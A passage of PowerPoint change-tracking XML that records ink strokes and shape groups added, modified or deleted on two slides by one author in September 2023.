          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:26.510" v="4772" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="78" creationId="{F3411935-B007-1B0E-CCF3-CE3A1A5B8AEF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:27.093" v="4773" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="79" creationId="{9FF296D7-F33F-DF91-FD74-A43A51D6B3F7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:27.484" v="4774" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="80" creationId="{499545EF-6146-1582-2A6F-395102333167}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:27.879" v="4775" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="81" creationId="{726BF0C4-706A-7735-7166-D281CB377CE3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:28.274" v="4776" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="82" creationId="{B63E962C-3AAB-960D-14C7-F0521EA36E6D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:28.658" v="4777" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="83" creationId="{011BED25-9107-1448-4BB8-5AC1577C96E1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:29.002" v="4778" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="84" creationId="{5B11BEF5-7EFE-422F-E03B-B7D46D8CED69}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="85" creationId="{0D24F3CC-0877-6254-7F8C-838181ED5DD6}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="86" creationId="{123391AC-591E-F180-D11E-B156A2AD41ED}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="87" creationId="{7DCB385A-D5FA-28A5-6694-8F5842724D66}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="88" creationId="{42200195-4006-2D89-E440-532902D8F7D0}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="90" creationId="{B79C3791-93F4-BF40-796F-8C4837DC595C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="91" creationId="{0F1B9A57-D1AE-C26C-C8ED-6F9D2BBDB638}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="92" creationId="{8BCF9D1D-BA48-1903-4EE4-BC9907226327}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:32:14.630" v="10093" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1491315966" sldId="278"/>
        </pc:sldMkLst>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="18" creationId="{A4CA1810-B36D-BDE4-011E-E6C14828293B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:34.951" v="4780"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="19" creationId="{AC9A07EB-516D-698D-0246-359B653172C7}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:17.784" v="4761"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="22" creationId="{4C433348-5EF1-A5C5-AE1D-DAF9195928E5}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:23.865" v="4771"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="29" creationId="{0868EA26-7D98-8548-FF6C-BB7875A67862}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:34.951" v="4780"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="39" creationId="{94F55429-E3C5-41A9-06CA-10FFAEF13CDF}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:36.733" v="4782"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="41" creationId="{E439F100-7B9C-BC7A-71FA-CBC1D0047ACE}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="43" creationId="{73140024-930B-96BB-8D47-311E8B0C4E83}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="48" creationId="{2D488E8D-D08D-B31E-4A67-3151B8C510AF}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:56.721" v="4792"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="53" creationId="{3C789311-D44A-29AF-F6DF-62EEF339471A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="54" creationId="{E00FB176-9D73-9EAD-84A6-B9828E304BF9}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="57" creationId="{37924C84-1C3D-F515-0B96-AE633C3DFE26}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="69" creationId="{B5D9DD24-AFA5-795C-3BBE-36F2E8AC8074}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="70" creationId="{B214229C-F394-C45E-8064-D3E380FA2D66}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:grpSpMk id="71" creationId="{908865EC-21B8-C3CA-EDC4-EA436C1831C5}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="2" creationId="{CBCD9156-A8A3-9E99-3FBF-F6E6CD28AC02}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="3" creationId="{80CCAA33-BCB3-FAAD-1920-14FD54F5D9E2}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="4" creationId="{1DD65087-0B1A-DBFA-55D8-B8D2366C749C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="5" creationId="{78ECAEC9-D2B2-117E-4162-BA217D09C34C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="6" creationId="{DCB39AE8-27A5-40E2-2B39-2D564C964025}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="7" creationId="{0B9C602C-B458-1E9E-E597-7F812F3E18FA}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="8" creationId="{CC93AFD5-F028-C7A9-44F9-51742392FD7B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="9" creationId="{4A2B2744-F8BB-B5DB-DF2B-6B36B7E1F87C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="10" creationId="{AA7AAC63-3CEF-D470-257D-5F8E9A65D0DB}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="11" creationId="{C5826D04-29F8-7F08-81D3-9166A42DFD8C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="12" creationId="{F4DFF426-6EC2-5F41-74D3-E2B4067982C1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="13" creationId="{C1378D08-CE94-800A-C3AF-6714271CAC64}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="14" creationId="{B3DB1425-2C1A-1826-76ED-2DAAAA0B878C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="15" creationId="{0F38DCDA-9B6F-ACCC-83CC-C877E1CCE09A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="16" creationId="{533EC692-A65E-88D9-AB04-C4C60FD4DDFB}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="17" creationId="{628D3124-6F88-940B-8F2C-AB6342729247}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="20" creationId="{424CE472-DF3A-E7C6-1AF0-E275D0A5AD09}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="21" creationId="{3F066882-881F-C7DA-1384-AD1C77E43045}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="23" creationId="{94839FFE-233F-C69D-8E26-1533DA2B52D3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="24" creationId="{63E76414-6495-E7D2-5542-FCEBE54900EE}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="25" creationId="{D2570140-CC77-03C5-332E-F00C2534DF4C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="26" creationId="{BC3D0BF8-FF16-DA8A-E384-302B3028B448}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="27" creationId="{99F755EF-C26E-8FB4-7537-809D65A2DBD6}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="28" creationId="{95C84BFB-990C-B8B0-FC53-F014EE966A01}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="30" creationId="{F323268A-1546-BA4A-1705-FED781479505}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="31" creationId="{41EEC3B2-3CC9-43C7-6F91-5A9D8C470A20}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="32" creationId="{EFF57559-F337-0A44-A7B8-04ED41999C8C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="33" creationId="{FC73FC2B-EA89-B4A2-17E2-E247B538D784}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="34" creationId="{99F3D92B-600E-698A-71AA-8C1C84AA926C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
